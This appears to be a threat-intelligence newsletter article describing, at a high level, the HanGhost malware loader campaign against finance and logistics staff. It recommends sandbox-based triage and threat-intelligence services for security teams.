X-Industry

A new malware campaign built around the HanGhost loader is actively targeting corporate environments, focusing on employees involved in payments, logistics, and contract operations.  The attack is designed to operate without leaving clear artifacts, enabling it to reach systems linked to revenue and operations before they are fully analyzed.  The campaign has already shown multiple waves of activity with different malware families, indicating active development and scaling rather than a one-off attack.[1]

How the Attack Unfolds and Why Most SOCs See It Too Late - The attack chain combines multiple techniques that, individually, appear benign but together create a highly evasive execution flow. 

See full attack analysis inside the ANY.RUN sandbox[2]

The attack utilizes scripts and PowerShell

It starts with obfuscated JavaScript that executes hidden PowerShell commands.  These commands execute a .NET loader directly in memory, which then retrieves a seemingly harmless image file containing an encrypted payload.  The payload is extracted and executed without ever being written to disk.

The malware payload hides inside an image

This chain is used to deliver multiple malware families, including PureHVNC, XWorm, Meduza, AgentTesla, and Phantom, with some cases also deploying UltraVNC for persistent remote access.  This results in alerts that are either low-priority or lack sufficient context, which slows triage and delays response.

Attackers Are Targeting Finance and Operations Roles in Businesses - The targeting model is deliberate.  Instead of targeting infrastructure or privileged admins, attackers focus on users who interact with financial processes and operational systems daily.  These users regularly run scripts, open attachments, and communicate externally, making malicious activity harder to distinguish from normal behavior.  Once compromised, their access can be used to influence transactions, documents, and internal workflows.

• Persistent remote access: Tools like PureHVNC and XWorm allow continuous monitoring and control 
• Payment systems exposure: Attackers can intercept or modify transaction details during execution 
• Contract manipulation risk: Access to documents and email threads enables unauthorized changes or fraud 

Logistics disruption: Compromised workflows can delay shipments and break operational processes.  The impact is linked directly to how these roles interact with business processes, not just system access.

3 Steps CISOs Need to Take to Detect and Stop HanGhost Early - Stopping HanGhost requires changing how triage, response, and threat hunting actually work under pressure.  The attack succeeds because teams spend too much time validating signals and not enough time understanding behavior early.

Fix Triage to Show Behavior, Not Indicators - Analysts cannot rely on hashes, domains, or reputation for this type of attack because most of the chain runs in memory and constantly changes.  Triage has to start with execution.

ANY.RUN’s Interactive Sandbox exposes HanGhost’s malicious activities in seconds

Suspicious files, scripts, and links need to be detonated immediately in an interactive sandbox so the team can see the real process chain, network activity, and hidden stages.  ANY.RUN’s Interactive Sandbox provides SOC teams with a fast, integration-ready solution for detecting malware & phishing attacks inside fully interactive virtual environments across Windows, macOS, Linux, and Android.

Thanks to advanced detection capabilities, Tier 1 analysts can quickly validate alerts, emails, files, and URLs in minutes, ensuring a short MTTR and preventing attacks from evolving into business security breaches.

Rebuild Response Around the Full Execution Chain - Containment decisions cannot be based on isolated alerts or single indicators.  Teams need to see the full execution chain, from the initial script to the final payload, and use that to define scope and response actions.

ANY.RUN’s sandbox details the attack TTPs to speed up response

Threat intelligence connects infrastructure, behaviors, and related activity, allowing responders to understand how far the attack may have spread and what needs to be blocked beyond the initial entry point.

Turn Threat Hunting into a Continuation of Real Incidents - Threat hunting should not rely on generic techniques when dealing with active campaigns like this.  It needs to start from confirmed behavior observed during triage and response. 

Once one case is identified, teams should immediately search for the same execution patterns across the environment and use threat intelligence to identify related activity seen in other organizations.  ANY.RUN’s TI Lookup provides SOC teams with the latest attack intel from 15,000 organizations, delivering instant, actionable context on over 40 types of IOCs and providing an industry- and geo-threat landscape view.  This expands detection coverage and reduces the chance of missed compromises.

ANY.RUN’s TI Lookup gives SOC teams industry and geo attack context

When combined, these capabilities shift SOC operations from reactive validation to proactive understanding.  That shift reduces dwell time, lowers incident costs, and prevents attacks from reaching business-critical systems.

Conclusion - HanGhost uses a multi-stage, fileless execution chain to deliver remote-access malware and credential stealers while evading traditional detection.  By combining obfuscated scripts, in-memory loaders, and payloads hidden in image files, attackers can reach systems linked to payments, contracts, and operations without leaving clear artifacts.

To stop this type of attack early, SOC teams need to run suspicious files and scripts in a controlled environment to expose their behavior and use real-time threat intelligence to understand how the activity connects to ongoing campaigns.  This allows teams to detect the attack earlier, scope it correctly, and respond before it spreads further.

This article is shared at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  We provide indicators of compromise information (CTI) via a notification service (RedXray) or an analysis service (CTAC).  For questions, comments, or assistance, please contact the office directly at 1-844-492-7225 or feedback@redskyalliance.com    

• Reporting: https://www.redskyalliance.org/
• Website: https://www.redskyalliance.com/
• LinkedIn: https://www.linkedin.com/company/64265941 

Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122

[1] https://hackread.com/active-hanghost-loader-payment-logistic-workflow/

[2] https://app.any.run/tasks/cc26155e-e8e9-442b-b000-8d1a1435e7db/